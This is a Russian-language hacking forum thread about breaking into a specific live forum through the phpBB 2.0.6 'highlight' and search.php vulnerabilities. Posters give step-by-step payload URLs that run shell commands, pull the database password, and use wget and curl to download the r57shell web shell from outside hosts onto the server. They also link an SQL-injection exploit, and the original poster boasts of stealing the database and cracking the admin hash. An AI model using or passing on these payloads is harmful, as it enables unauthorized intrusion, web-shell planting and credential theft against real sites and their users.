Как использовать уязвимость viewtopic на phpBB 2.0.6?

Как использовать уязвимость highlight на phpBB 2.0.6?

Саламмалейкум...
дело такое....
www.*****.com/forums/ -напрач дырявый....с помощью команд &highlight=%2527.$poster=%60$var%60.%2527&var=id и &highlight=%2527.$poster=$dbpasswd(name).%2527 получил логин и пасс от базы....дело в том что в MYSQL ИДЕНТИФИКАЦИЯ по IP.........что можно сделать? думал о подмене IP но это геморно....

 

Залей RST MySQL v2.0 и через неё подцепи базу. Советую вначале разархивировать файл и перезалить его на какой-нибудь народ, но уже с расширением .txt. Далее командой wget -o ./cache/shell.php http://xxx.narod.ru/s.txt загоняешь скрипт в папку cache

 

&highlight=%2527.$poster=`$cmd`.%2527&cmd=id - если выполняется id, то вполне вероятно, можно залить шелл. Если не получается, скинь мне ссылку на форум в ПМ, помогу.

 

Осуществляется подключение определенново ip адреса или с локал-хоста.

Мдя,думай прежде чем написать или хотя бы попробуй повторить на себе то что посеветовал человеку.

 

Название топика - Как использовать уязвимость viewtopic на phpBB 2.0.6?
Ковыряем 2.0.6

Что касается более старой версии форума, 2.0.6, то об этой уязвимости известно уже давно, но количество уязвимых ресурсов не спешит сокращаться. Под нашим прицелом находится скрипт search.php, осуществляющий поиск по конференциям. Если внимательно посмотреть на код этого сценария, можно заметить, что когда переменная $show_results не установлена в значение posts или topics, становится возможным поместить в $search_results ядовитую строку, которая изменит выполняемый sql-запрос.

Поскольку об этом баге известно уже давно, появился даже эксплоит, который самостоятельно реализует sql-injection: тебе нужно лишь указать URL форума, имя пользователя, пароль которого тебя интересует, и идентификатор валидного топика. Скачать сплоит, написанный на php, можно здесь: www.scan-associates.net/papers/gemuruh-v2.php.txt; для его нормальной работы нужна библиотека cURL.

Чтобы проверить какой-либо из серверов на уязвимость, этот сценарий нужно залить на сервер и выполнить примерно следующим образом:

Sploit.php http://forum.site.ru user 12

Где http://forum.site.ru – это адрес форума, user – ник пользователя, чей пароль интересен, а 12 – идентификатор топика, в обсуждении которого участвовал пациент. Если форум уязвим, в результате работы эксплойта на экране появится хэш пароля пользователя user и останется лишь расшифровать его. Если же появилась строка «Not vulnerable, register_globals=Off», это означает, что форум неуязвим из-за настроек PHP. Справедливости ради надо отметить, что register_globals=Off – это дефолтные настройки интерпретатора, но умников в инете хватает.
хакеr.ru

 

ты обрати внимание на первый пост! там расматривается канкретная проблема....=)
то VAn шелл не могу загрузить кароч всё виснит...

 

Я посмотрел на название топика.
Ты безнадёжен.

 

Мда....

1)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=id
Смотрим свои права.
2)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=pwd
Смотрим полный путь к форуму.
3)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=ls%20-la
Смотрим права на директории. В директории /forums/ нет папок с нужными нам правами.
4)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=cd%20..;ls%20-la
Переходим на директорию выше. И снова смотрим папки. Находим папку с правами drwxrwxrwx.
4)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=which%20lynx%20links%20get%20wget%20fetch%20curl
Смотрим какие качалки нам доступны.
5)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=curl%20--output%20/home/сайт/public_html/hiscores/shell.php%20http://rst.void.ru/download/r57shell.txt
Заливаем шелл.

_http://сайт/hiscores/shell.php - он будет тут.

Просто давать ссылку на шелл, который я залил не хочу. Сделай что-нибудь сам. Если уж после того, как я всё расписал у тебя не получится, то ты действительно совсем безнадёжен.

 

ну..ну...
закрывайте тему....форум пломан....
База на руках
АДмин лох....его хэш через 15 секунд расшифровался..
____________________________________________
С уважением к некоторым!

 

r57ШЕлл давал возможность выполнять команды тока в папке в каторую он был закинут....единственное что можно было сделать так это Бэк и Бинд-конект....и один фиг они ничо не дали права остались НОубади...наконец...наткнулся на папку tmp в каторой так и ждалала миня БД...в итоге....база на руках...